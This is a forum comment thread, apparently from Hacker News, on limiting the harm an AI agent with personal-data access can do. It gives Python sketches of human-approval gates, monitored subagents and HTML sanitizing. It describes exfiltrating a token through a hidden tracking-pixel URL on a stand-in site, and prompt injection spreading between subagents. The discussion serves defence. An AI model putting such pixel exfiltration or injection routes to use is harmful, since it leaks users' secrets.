Comment by zozbot234
1 day ago
You could run them in a container and put access to highly sensitive personal data behind a "function" that requires a human-in-the-loop for every subsequent interaction. E.g. the access might happen in a "subagent" whose context gets wiped out afterwards, except for a sanitized response that the human can verify.
Similar safeguards could apply to posting to external services, which might require direct confirmation or be performed by fresh subagents with sanitized, human-checked prompts and contexts.
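A minimal sketch of what that gate could look like, assuming the sensitive lookup runs in an isolated scope and a human signs off on the sanitized result (the function names here are hypothetical, not any particular framework's API):

```python
# Hypothetical sketch: the sensitive access happens in a throwaway scope,
# and only a human-approved, sanitized summary re-enters the main context.

def require_human_approval(summary: str) -> bool:
    """Block until a person explicitly approves the sanitized output."""
    answer = input(f"Subagent wants to return:\n{summary}\nAllow? [y/N] ")
    return answer.strip().lower() == "y"

def access_sensitive_data(query: str) -> str:
    # Placeholder for the real lookup (password vault, health records, etc.).
    return f"<sensitive result for {query!r}>"

def sanitize(raw: str) -> str:
    # Placeholder: redact, truncate, or template the raw result.
    return raw.replace("<sensitive", "<redacted")

def gated_lookup(query: str) -> str | None:
    """Run the lookup in an isolated scope; only the approved,
    sanitized summary ever leaves this function."""
    raw = access_sensitive_data(query)   # lives only in this scope
    summary = sanitize(raw)
    if require_human_approval(summary):
        return summary
    return None  # nothing from the subagent's context persists
```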
So you approve access to the secret once; how can you be sure it wasn't sent somewhere else or persisted somehow for future sessions?
Say you gave it access to Gmail for the sole purpose of emailing your mom. Are you sure the email it sent didn’t contain a hidden pixel from totally-harmless-site.com/your-token-here.gif?
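One concrete check a gatekeeper could run before anything goes out: scan the outgoing HTML for remotely loaded resources whose URLs contain secret-looking strings. A rough sketch, with an illustrative secret list rather than anything exhaustive:

```python
from html.parser import HTMLParser

class RemoteResourceFinder(HTMLParser):
    """Collect URLs of remotely loaded resources (img, script, link, ...)."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href") and value and value.startswith(("http://", "https://")):
                self.urls.append(value)

def flags_exfiltration(html_body: str, known_secrets: list[str]) -> list[str]:
    """Return remote URLs that contain any known secret verbatim."""
    finder = RemoteResourceFinder()
    finder.feed(html_body)
    return [u for u in finder.urls if any(s in u for s in known_secrets)]

# Example: a "hidden pixel" carrying a token in its URL gets flagged.
body = '<p>Hi mom!</p><img src="https://totally-harmless-site.com/abc123token.gif" width="1" height="1">'
print(flags_exfiltration(body, ["abc123token"]))
```

Of course this only catches a secret copied verbatim; an encoded or split token slips past a naive substring check.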
Access to the secret, long-term persistence/reasoning, and posting should all be handled by separate subagents, and all exchange of data among them should be monitored. This is easy in principle, since the data is just plain-text context.
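A rough sketch of that monitoring layer, assuming the subagents only ever talk through a broker that sees every plain-text message (the agent names and policy rules are made up for illustration):

```python
# Hypothetical broker: subagents never talk directly; every message
# passes through route(), where it is logged and checked against policy.

AUDIT_LOG = []

def policy_allows(sender: str, receiver: str, message: str) -> bool:
    # Illustrative rules: the secret-holding agent may never talk to the
    # posting agent directly, and nothing reaches "poster" without sign-off.
    if sender == "secret_holder" and receiver == "poster":
        return False
    if receiver == "poster":
        return input(f"Send to poster?\n{message}\n[y/N] ").strip().lower() == "y"
    return True

def route(sender: str, receiver: str, message: str) -> bool:
    """Log the exchange, then allow or block it."""
    AUDIT_LOG.append((sender, receiver, message))
    return policy_allows(sender, receiver, message)
```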
"Easy in principle" is doing a lot of work here. Splitting things into subagents sounds good in theory, but if a malicious prompt flows through your plain-text context stream, nothing fundamental has changed. If the outward-facing agent gets injected and passes along a reasonable-looking instruction to the agent holding secrets, you haven't improved security at all.
I don't have one yet, but I would just give it access to function calling for things like communication.
Then I can surveil and route the messages at my own discretion.
If I gave it access to email my mom (I actually did this with an assistant I built after the ChatGPT launch), I would really be giving it access to a function I wrote that results in an email.
The function can handle the data any way it pleases, for instance stripping HTML.
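Something along these lines (the SMTP relay and addresses are placeholders; the point is that the assistant only ever calls `send_email_to_mom`, and the function decides what actually goes out):

```python
import re
import smtplib
from email.message import EmailMessage

def strip_html(body: str) -> str:
    """Crude sanitizer: drop all tags so tracking pixels and scripts
    never make it into the outgoing message."""
    return re.sub(r"<[^>]+>", "", body)

def send_email_to_mom(subject: str, body: str) -> None:
    """The only email 'function call' the assistant is given."""
    msg = EmailMessage()
    msg["Subject"] = subject
    msg["From"] = "assistant@example.com"   # placeholder
    msg["To"] = "mom@example.com"           # placeholder
    msg.set_content(strip_html(body))       # plain text only

    with smtplib.SMTP("localhost") as smtp:  # placeholder SMTP relay
        smtp.send_message(msg)
```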